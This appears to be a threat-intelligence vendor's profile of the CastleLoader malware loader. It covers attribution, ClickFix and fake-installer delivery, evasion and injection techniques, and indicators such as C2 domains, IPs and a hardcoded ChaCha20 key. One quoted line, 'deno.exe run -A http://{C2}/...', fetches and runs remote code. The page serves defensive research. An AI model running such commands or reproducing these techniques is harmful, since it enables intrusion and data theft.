CastleLoader
CastleLoader is a modular malware loader sold under a malware-as-a-service model and used by multiple affiliates and threat clusters. Reporting links it most consistently to the actor tracked as GrayBravo, formerly TAG-150, and some research also notes overlaps with MuddyWater through shared code-signing certificates and delivery chains involving FakeSet. It has been used in campaigns targeting government entities, U.S. government agencies, critical infrastructure, IT firms, logistics companies, and multiple other industries.
Observed delivery vectors include ClickFix social-engineering chains, bogus GitHub and SourceForge repositories, fake installers, Deno-based multi-stage chains, NSIS installers, and infection flows using Inno Setup and AutoIt. Multiple reports describe users being tricked into executing commands copied from fake CAPTCHA or software-installation pages. CastleLoader has also been delivered by FakeSet and used in chains that ultimately deploy LummaC2, NetSupport RAT, Rhadamanthys, StealC, RedLine, DeerStealer, SectopRAT, and CastleRAT; one report also describes an in-memory .NET stealer dubbed CastleStealer delivered as a task from CastleLoader.
Technically, CastleLoader is described as a stealthy first-stage loader focused on flexible payload deployment and in-memory execution. Reported behaviors include configuration decryption in heap memory, RC4-encrypted next-stage retrieval, ChaCha20- or ChaCha-encrypted C2 traffic, custom serialized tasking, host profiling, anti-VM checks, optional screenshot capture, installed-AV enumeration, and execution-status reporting. Specific analyses describe hashed API resolution, XOR-obfuscated strings, reflective PE loading, direct ntdll syscall usage, ReplaceTextW callback execution, process hollowing, and geofencing or language/location checks. It has been observed collecting host metadata such as username, computer name, domain name, Windows version, architecture, and antivirus products before requesting tasks.
Infrastructure and indicators directly mentioned in the content include C2 domains and URLs such as maybedontbanplease[.]com, trindastal[.]com, sedaliarealty[.]net, and historical infrastructure at 94[.]159[.]113[.]32 and 38[.]180[.]136[.]139. One report states CastleLoader used the User-Agent string "GoogeBot." Additional indicators include campaign UUID b47e1791-82ba-544f-9aab-ebbdd36d8c89, auth token D63TnQ3WhSnjI0yVKaILRu8U1WttdnE, instance ID YvAPcF0OnjSYuDW7QosQ, hardcoded ChaCha20 key f5dbaa09e60343f252a80d4a313a36ac11442d96b0896022d1a83744e3c11feb, nonce bbbbf632514c0caae655b2c4, and sample hash bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92 for the CastleLoader core. Related certificate artifacts mentioned in reporting include Common Names Amy Cherne and Donald Gay, and an EV-signed NSIS sample using a certificate issued to SERPENTINE SOLAR LIMITED.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Threat actor TAG-150 has advanced its CastleLoader malware operations with the development of a pair of CastleRAT trojan variants enabling system data exfiltration, command execution, and further payload deployment.
Another malware family linked to MuddyWater is a downloader called FakeSet, which the security researchers say was used in recent infections to deliver CastleLoader. CastleLoader is sold as a service to multiple affiliates and cyber crews.
Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader, strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model.
Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader, strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model.
Techniques & procedures
33 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
Execution
8 techniques
Execution
The first task is a NetSupport RAT delivery ... write to %ProgramData%\CeoliauD\Dabkina, register as a Scheduled Task with logon trigger so the payload runs on next login
They instruct the operator to open the Windows Run dialog box or PowerShell terminal and cut and paste malware code into the system to "fix" the problem.
The initial payload is executed using a command that invokes cmd.exe with a minimized window and uses process output from the caret-obfuscated finger utility.
Lastly, the renamed Python interpreter will be used to execute inline Python code.
The following stage is executed with the downloaded Deno executable: ... deno.exe run -A http://{C2}/{random_path}.js
In this case, the bytecode file is another in-memory loader that uses the Windows ctypes interface to execute shellcode received from a local named pipe.
Persistence
2 techniques
Persistence
Privilege Escalation
5 techniques
Privilege Escalation
The first task is a NetSupport RAT delivery ... write to %ProgramData%\CeoliauD\Dabkina, register as a Scheduled Task with logon trigger so the payload runs on next login
This will be loaded in the memory of the same host python interpreter.
The second task is in-memory only ... launch method 7 for APC injection, fetching net40.bin and injecting the resulting .NET binary into a target process without ever touching disk
Stealth
9 techniques
Stealth
The payload downloaded by the renamed Python interpreter is another Python script that performs a Cyrillic substitution operation. Prior to Base64 decoding, the script replaces specific Cyrillic characters with their Latin equivalents.
The malware generates a randomized filename under %LocalAppData% directory and assigns it as a disguised executable path (e.g. 1006326830900030409.com or 1006326830900030409.exe). Next, this file is then used as a renamed copy of the legitimate Windows curl.exe binary.
This directory is also created under %LocalAppData% and mimics a legitimate Python installation structure, depending on the runtime variant being used (embedded CPython or IronPython).
This will be loaded in the memory of the same host python interpreter.
The second task is in-memory only ... launch method 7 for APC injection, fetching net40.bin and injecting the resulting .NET binary into a target process without ever touching disk
Embedded JavaScript dynamically fetches remote content from this endpoint, applies ROT13 to decode the response... Prior to Base64 decoding, the script replaces specific Cyrillic characters with their Latin equivalents... using Base64 encoding, XOR decryption... The first 64 bytes of the downloaded blob are treated as the RC4 key... all C2 communication is encrypted via the symmetric ChaCha algorithm.
Despite differences in tooling and runtime selection, both variants follow the same overall execution chain, including LOLBin abuse, portable Python runtime deployment, staged payload retrieval, and in-memory execution of the next-stage malware payload.
Credential Access
2 techniques
Credential Access
Discovery
3 techniques
Discovery
The loader issues a get_tasks request to its C2 server using generated identifiers of the infected host... along with system profiling data (username, computer_name, domain_name, windows_version, arch, active_av and active_list).
Collection
3 techniques
Collection
Command and Control
4 techniques
Command and Control
The resulting decompressed payload reveals behavior consistent with secondary-stage command-and-control (C2) activity. It initiates outbound connections to retrieve additional payloads...
For the initial configuration fetch, the malware issues a GET request to a hardcoded base URL... the loader contacts only the base endpoint and transmits encrypted data within the HTTP POST request body.
IOCs tracked for this family
112 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
41 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A fileless Malware-as-a-Service loader used in the ClickFix campaign to retrieve configuration, communicate with C2 using ChaCha20 and RC4-based mechanisms, execute tasks, and deliver next-stage payloads including a Python-based RAT.
A malware loader delivered through a Deno-based multi-stage infection chain using the ClickFix lure.
A malware loader observed being delivered through a Deno-based multi-stage infection chain involving the ClickFix lure.
A multi-stage malware loader delivered via a ClickFix-style social engineering chain. It uses finger.exe, BYOI with a legitimate Python embed package, shellcode, reflective PE loading, encrypted C2 traffic, tasking, persistence options, screenshot capture, and multiple launch methods to deliver follow-on payloads including NetSupport RAT and a stealer.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.